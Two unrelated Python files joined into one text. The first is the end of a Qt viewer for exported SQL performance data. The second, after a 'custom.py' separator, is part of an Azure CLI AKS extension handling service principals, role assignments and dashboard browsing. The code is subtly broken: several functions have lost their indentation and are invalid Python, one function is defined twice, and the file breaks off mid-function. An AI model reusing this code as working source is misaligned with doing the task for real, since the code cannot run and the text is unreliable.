# Database reference
class DBRef():
    """Database reference: remembers the engine kind and connection string so
    additional named connections can be opened on demand."""
    def __init__(self, is_sqlite3, dbname):
        self.is_sqlite3 = is_sqlite3
        self.dbname = dbname
    def Open(self, connection_name):
        """Open a new Qt SQL connection named connection_name.

        For PostgreSQL, dbname may be a space-separated list of key=value
        options (hostname, port, username, password, dbname) or a bare
        database name. Returns (db, dbname); raises on connection failure.
        """
        dbname = self.dbname
        if self.is_sqlite3:
            db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
        else:
            db = QSqlDatabase.addDatabase("QPSQL", connection_name)
            for opt in dbname.split():
                if "=" not in opt:
                    dbname = opt
                    continue
                pieces = opt.split("=")
                key, value = pieces[0], pieces[1]
                if key == "hostname":
                    db.setHostName(value)
                elif key == "port":
                    db.setPort(int(value))
                elif key == "username":
                    db.setUserName(value)
                elif key == "password":
                    db.setPassword(value)
                elif key == "dbname":
                    dbname = value
        db.setDatabaseName(dbname)
        if not db.open():
            raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
        return db, dbname
# Main
def Main():
    """Entry point: parse arguments, open the database, run the Qt main loop."""
    usage_str = "exported-sql-viewer.py [--pyside-version-1] <database name>\n" \
                " or: exported-sql-viewer.py --help-only"
    ap = argparse.ArgumentParser(usage = usage_str, add_help = False)
    ap.add_argument("--pyside-version-1", action='store_true')
    ap.add_argument("dbname", nargs="?")
    ap.add_argument("--help-only", action='store_true')
    args = ap.parse_args()
    if args.help_only:
        # Show only the help window; no database needed.
        app = QApplication(sys.argv)
        mainwindow = HelpOnlyWindow()
        mainwindow.show()
        err = app.exec_()
        sys.exit(err)
    dbname = args.dbname
    if dbname is None:
        ap.print_usage()
        print("Too few arguments")
        sys.exit(1)
    # Sniff the file header to distinguish SQLite3 from a PostgreSQL spec.
    is_sqlite3 = False
    try:
        f = open(dbname, "rb")
        if f.read(15) == b'SQLite format 3':
            is_sqlite3 = True
        f.close()
    except:
        # Not a readable file: assume a PostgreSQL connection string.
        pass
    dbref = DBRef(is_sqlite3, dbname)
    db, dbname = dbref.Open("main")
    glb = Glb(dbref, db, dbname)
    app = QApplication(sys.argv)
    glb.app = app
    mainwindow = MainWindow(glb)
    glb.mainwindow = mainwindow
    mainwindow.show()
    err = app.exec_()
    # Stop background fetchers etc. before closing the database.
    glb.ShutdownInstances()
    db.close()
    sys.exit(err)

if __name__ == "__main__":
    Main()
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_12_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import ADDONS
logger = get_logger(__name__)
def which(binary):
    """Return the full path of *binary* found on PATH, or None.

    On Windows the '.exe' suffix is appended before searching. Robustness
    fix: an unset PATH no longer raises AttributeError (None.split).
    """
    path_var = os.getenv('PATH') or ''
    if platform.system() == 'Windows':
        binary = binary + '.exe'
        parts = path_var.split(';')
    else:
        parts = path_var.split(':')

    for part in parts:
        bin_path = os.path.join(part, binary)
        # Must exist, be a regular file, and be executable by us.
        if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
            return bin_path

    return None
def wait_then_open(url):
    """
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
    """
    # NOTE(review): the unconditional break means only one probe is ever made —
    # on URLError we sleep 1s and still fall through to break, so range(1, 10)
    # never retries. Confirm whether the break should be inside the try
    # (i.e. break only once the URL responds).
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
        except URLError:
            time.sleep(1)
        break
    webbrowser.open_new_tab(url)
def wait_then_open_async(url):
    """
    Spawns a daemon thread that waits for a bit then opens a URL.
    """
    # Fix: args must be a tuple. The original passed the set literal ({url}),
    # which only worked by accident because Thread unpacks any iterable.
    t = threading.Thread(target=wait_then_open, args=(url,))
    t.daemon = True
    t.start()
def _ssl_context():
    """Return an SSL context: a permissive legacy context on old Pythons or
    Cloud Shell on Windows, otherwise the platform default context."""
    needs_legacy = sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows')
    if not needs_legacy:
        return ssl.create_default_context()
    try:
        return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
    except AttributeError:
        return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and its service principal, with retries.

    Returns the application id on success, or False if the service principal
    could not be created after 10 attempts.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fix: the original spelled the keyword 'messsage', which the hook's
    # **kwargs signature silently ignored, so this status was never shown.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    # AAD propagation can lag; retry with linear backoff.
    for x in range(0, 10):
        hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            time.sleep(2 + 2 * x)
    else:
        return False
    hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Assign role to the principal/MSI, retrying while AAD data propagates.

    Returns True on success (or if the assignment already exists), False
    after 10 failed attempts.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            # An existing assignment counts as success.
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except:  # pylint: disable=bare-except
            # Deliberate best-effort: any other failure just triggers a retry.
            pass
        time.sleep(delay + delay * x)
    else:
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete the role assignment for service_principal, retrying while AAD
    data propagates. Returns True on success, False after 10 attempts;
    CLIError from the underlying call is re-raised immediately.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError as ex:
            # User-facing errors are not retried.
            raise ex
        except CloudError as ex:
            logger.info(ex)
        time.sleep(delay + delay * x)
    else:
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist the service principal/secret for subscription_id into the CLI
    config directory, merging with any previously stored subscriptions."""
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal

    config_path = os.path.join(get_config_dir(), file_name)
    all_creds = load_service_principals(config_path=config_path) or {}
    all_creds[subscription_id] = entry
    # 0o600: the file holds credentials, so restrict access to the owner.
    with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
                   'w+') as sp_file:
        json.dump(all_creds, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored credentials entry for subscription_id, or None."""
    config_path = os.path.join(get_config_dir(), file_name)
    all_creds = load_service_principals(config_path)
    return all_creds.get(subscription_id) if all_creds else None
def load_service_principals(config_path):
    """Parse the stored credentials JSON at config_path.

    Returns the parsed dict, or None if the file is missing or unparseable.
    """
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as f:
            return shell_safe_json_parse(f.read())
    except:  # pylint: disable=bare-except
        # Deliberate best-effort: a corrupt file is treated as "no config".
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Validate or create an incremental-mode ARM deployment.

    When validate is True only validation runs; otherwise the deployment is
    created (optionally without waiting via no_wait).
    """
    from azure.cli.core.profiles import ResourceType
    DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')

    # Newer API versions wrap the properties in a Deployment model and return
    # a poller from validate(); older ones take the properties directly.
    if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
        Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
        deployment = Deployment(properties=properties)

        if validate:
            validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
    if validate:
        return smc.validate(resource_group_name, deployment_name, properties)
    return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None):
    """Create an AAD application with password or key credentials.

    Raises CLIError with guidance when the caller lacks directory permission;
    other graph errors propagate unchanged.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
                                                         key_usage=key_usage, start_date=start_date, end_date=end_date)

    app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                   display_name=display_name,
                                                   identifier_uris=identifier_uris,
                                                   homepage=homepage,
                                                   reply_urls=reply_urls,
                                                   key_credentials=key_creds,
                                                   password_credentials=password_creds)
    try:
        return client.create(app_create_param)
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Build the (password_creds, key_creds) pair for an AAD application.

    At most one of *password* / *key_value* may be given; the unused side of
    the returned tuple is None. Dates may be datetimes or ISO strings and
    default to a one-year window starting now (UTC).
    """
    if password and key_value:
        raise CLIError('specify either --password or --key-value, but not both.')
    # Normalize the validity window: default start is "now", strings are
    # parsed, and a missing end date means one year after the start.
    if not start_date:
        start_date = datetime.datetime.utcnow()
    elif isinstance(start_date, str):
        start_date = parse(start_date)
    if not end_date:
        end_date = start_date + relativedelta(years=1)
    elif isinstance(end_date, str):
        end_date = parse(end_date)
    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'
    password_creds, key_creds = None, None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
    return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create an AAD service principal for an existing application.

    *identifier* may be an appId GUID, an identifier URI, or an application
    object id; when *resolve_app* is True it is resolved to the appId first,
    otherwise it is used as the appId directly.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)
    if resolve_app:
        # A GUID is treated as an appId; any other string as an identifier URI.
        try:
            uuid.UUID(identifier)
            result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
        except ValueError:
            result = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not result:  # assume we get an object id
            result = [rbac_client.applications.get(identifier)]
        app_id = result[0].app_id
    else:
        app_id = identifier
    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Create a role assignment, resolving *assignee* to an object id only
    when it is a service principal (MSI callers already pass an object id)."""
    return _create_role_assignment(
        cli_ctx, role, assignee,
        resource_group_name=resource_group_name,
        scope=scope,
        resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment for *assignee* at the computed scope.

    *role* may be a role name or a definition GUID. *assignee* is resolved
    through the Graph API to an object id unless *resolve_assignee* is
    False (i.e. it already is an MSI object id).
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
    # XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
    # ref: https://github.com/Azure/azure-cli/issues/2458
    role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
    # assignment names are arbitrary; a fresh GUID is conventional
    assignment_name = uuid.uuid4()
    custom_headers = None
    return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments, either by explicit *ids* or by filters.

    When *ids* is given no other filter may be supplied. With no filters at
    all, the user is prompted for confirmation (unless *yes*) since that
    would delete every assignment under the subscription.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError('When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # BUGFIX: 'assignee' appeared twice in the original any([...]) list.
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        from knack.prompting import prompt_y_n
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete *role* assignments for *service_principal*, retrying on AAD lag.

    AAD can have delays in propagating data, so sleep and retry up to 10
    times with a linearly growing backoff. Returns True on success, False
    when every attempt failed with a CloudError; CLIError is re-raised.
    """
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            break
        except CLIError:
            # BUGFIX: bare 'raise' preserves the original traceback;
            # the previous 'raise ex' re-raised from this frame.
            raise
        except CloudError as ex:
            # transient service error — back off and retry
            logger.info(ex)
            time.sleep(delay + delay * x)
    else:
        # loop exhausted without a successful delete
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """List role assignments matching the given scope/assignee/role filters.

    Server-side filtering is used where possible (scope via atScope(),
    principal via OData filter); the scope, role and assignee constraints
    are then re-applied client-side on the returned list.
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            # include assignments granted through the principal's group memberships
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # NOTE(review): for inherited assignments the assignment's own scope
        # string is used as the regex *pattern* matched against the requested
        # scope (so a parent scope prefix-matches) — the argument order looks
        # inverted at first glance; confirm this is intended.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, service principal name, or object id) to an AAD object id.

    Tries, in order: user principal name (when the string contains '@'),
    service principal name, then a raw object id verified via the Graph
    objects API. Raises CLIError when nothing matches.
    """
    client = get_graph_rbac_management_client(cli_ctx)
    result = None
    if assignee.find('@') >= 0:  # looks like a user principal name
        result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
    if not result:
        result = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not result:  # assume an object id, let us verify it
        result = _get_object_stubs(client, [assignee])
    # 2+ matches should never happen, so we only check 'no match' here
    if not result:
        raise CLIError("No matches in graph database for '{}'".format(assignee))
    return result[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Look up directory-object stubs for the given object ids via the Graph objects API."""
    params = GetObjectsParameters(include_directory_object_references=True,
                                  object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True when a 'Network Contributor' assignment already exists exactly at *scope*.

    Only assignments whose scope equals *scope* count (inherited
    assignments at parent scopes do not).
    """
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    assignments_client = get_auth_management_client(cli_ctx, scope).role_assignments
    return any(
        assignment.scope == scope and
        assignment.role_definition_id.endswith(network_contributor_role_id)
        for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()'))
# Case-insensitive matcher for a user-assigned managed identity resource id.
# Groups: (1) subscription id, (2) resource group name, (3) identity name.
_re_user_assigned_identity_resource_id = re.compile(
    r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
    flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
    """Fetch the user-assigned managed identity referenced by *resource_id*.

    Raises CLIError when the resource id cannot be parsed, when the
    identity does not exist, or when the MSI service returns an error.
    """
    msi_client = get_msi_client(cli_ctx)
    # the parsing regex is written against a lowercased id
    resource_id = resource_id.lower()
    match = _re_user_assigned_identity_resource_id.search(resource_id)
    if match:
        resource_group_name = match.group(2)
        identity_name = match.group(3)
        try:
            identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                               resource_name=identity_name)
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise CLIError("Identity {} not found.".format(resource_id))
            raise CLIError(ex.message)
        return identity
    raise CLIError("Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Return the client id of the user-assigned managed identity at *resource_id*."""
    return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd,  # pylint: disable=too-many-statements,too-many-branches
               client,
               resource_group_name,
               name,
               disable_browser=False,
               listen_address='127.0.0.1',
               listen_port='8001'):
    """Open the cluster's Kubernetes dashboard, or the portal resources view.

    For clusters on k8s >= 1.19.0 or without the kube-dashboard addon this
    points the user at the Azure portal workloads blade. Otherwise it
    locates the in-cluster dashboard pod, runs 'kubectl proxy' locally and
    opens a browser tab (unless *disable_browser* is set). In Cloud Shell
    the tunnel is exposed through the console's openport service.
    """
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            cmd.cli_ctx.cloud.endpoints.portal +  # Azure Portal URL (https://portal.azure.com for public cloud)
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)
        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return
    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # find the port the dashboard container listens on
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))
    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'
    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning('To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
